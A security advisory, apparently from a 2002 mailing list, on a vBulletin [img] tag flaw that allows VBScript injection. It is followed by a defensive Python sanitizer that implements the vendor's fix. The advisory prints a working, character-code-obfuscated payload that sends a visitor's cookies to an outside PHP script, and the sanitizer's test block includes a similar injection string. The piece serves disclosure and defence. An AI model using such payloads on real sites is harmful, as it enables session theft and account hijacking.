Hi,

I've discovered a vulnerability in vBulletin's [img] tag implementation that allows users to inject VBScript code into posts and private messages ([img] is switched on by default). Through that, an attacker is able to steal other users' cookies and maybe hijack their accounts.

The following code sends the user's cookie to a PHP script (http://www.ignite.barrysworld.net/test.php?c= in this case, which just prints it back to the browser). It is enclosed in a [code] tag, the URL is encoded as ASCII character codes, and line breaks are inserted to avoid filtering of some characters and insertion of <br> tags:

[code][img]vbscript:location.replace(
chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+
chr(47)+chr(47)+chr(119)+chr(119)+chr(119)+
chr(46)+chr(105)+chr(103)+chr(110)+chr(105)+
chr(116)+chr(101)+chr(46)+chr(98)+chr(97)+
chr(114)+chr(114)+chr(121)+chr(115)+chr(119)+
chr(111)+chr(114)+chr(108)+chr(100)+chr(46)+
chr(110)+chr(101)+chr(116)+chr(47)+chr(116)+
chr(101)+chr(115)+chr(116)+chr(46)+chr(112)+
chr(104)+chr(112)+chr(63)+chr(99)+chr(61)+
escape(document.cookie) )[/img][/code]

History:

Feb 19 02: contacted Jelsoft
Feb 20 02: Vendor confirmed the bug
Feb 21 02: Jelsoft claimed to have made a patch "which clamps down on what characters are allowed in an [img] tag, as well as requiring it to start with http://". Sounds good ;)

vBulletin 2.2.3 & 2.2.4 have been out for some weeks, but there are still sites using vulnerable versions, so better update!

lates,
Cano2
mailto:Cano2@buhaboard.de

--
Truly rich are those who have more dreams than reality can destroy
BuHa-Security Board
www.buhaboard.de
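A minimal implementation of the two rules the vendor described for the fix (the [img] URL must start with http:// and may only contain a restricted set of characters), written here as an added example in Python rather than vBulletin's own PHP; the regexes, function names and sample inputs are my own assumptions, not code from the advisory or from Jelsoft:

```python
import html
import re

# Added example, not vBulletin's code: a minimal renderer for the [img] BBCode
# that applies the two rules the vendor described, (1) the URL must start with
# "http://" and (2) only a conservative set of URL characters is allowed.
# Anything else is shown as escaped text instead of becoming an <img>.

IMG_TAG = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE | re.DOTALL)

# Whitelist: letters, digits and a few URL punctuation characters. No
# whitespace or line breaks (which the payload in the advisory relied on),
# no parentheses, quotes or angle brackets, and no scheme other than http://.
# (Assumption: https:// is not accepted either, matching the 2002 description.)
SAFE_IMG_URL = re.compile(r"^http://[A-Za-z0-9._~/?=&%#:+-]+$")


def is_safe_img_url(url: str) -> bool:
    """True only if url passes the whitelist, so a vbscript:/javascript:
    scheme or an embedded newline can never reach the src attribute."""
    return SAFE_IMG_URL.fullmatch(url) is not None


def render_img_tags(bbcode: str) -> str:
    """Render [img]...[/img] to <img>, escaping any tag that fails the check.

    The check is applied to every [img] tag wherever it appears, so wrapping
    the tag in another BBCode element does not bypass it."""
    def replace(match: re.Match) -> str:
        url = match.group(1)
        if is_safe_img_url(url):
            return '<img src="%s">' % html.escape(url, quote=True)
        # Rejected: render the whole tag as inert, escaped text.
        return html.escape(match.group(0))
    return IMG_TAG.sub(replace, bbcode)


if __name__ == "__main__":
    # Constructed inputs: a benign image and a scheme-injection attempt of
    # the kind described in the advisory (line break inside the tag included).
    print(render_img_tags("[img]http://example.org/pic.gif[/img]"))
    print(render_img_tags("[img]vbscript:location.replace(\n escape(document.cookie) )[/img]"))
```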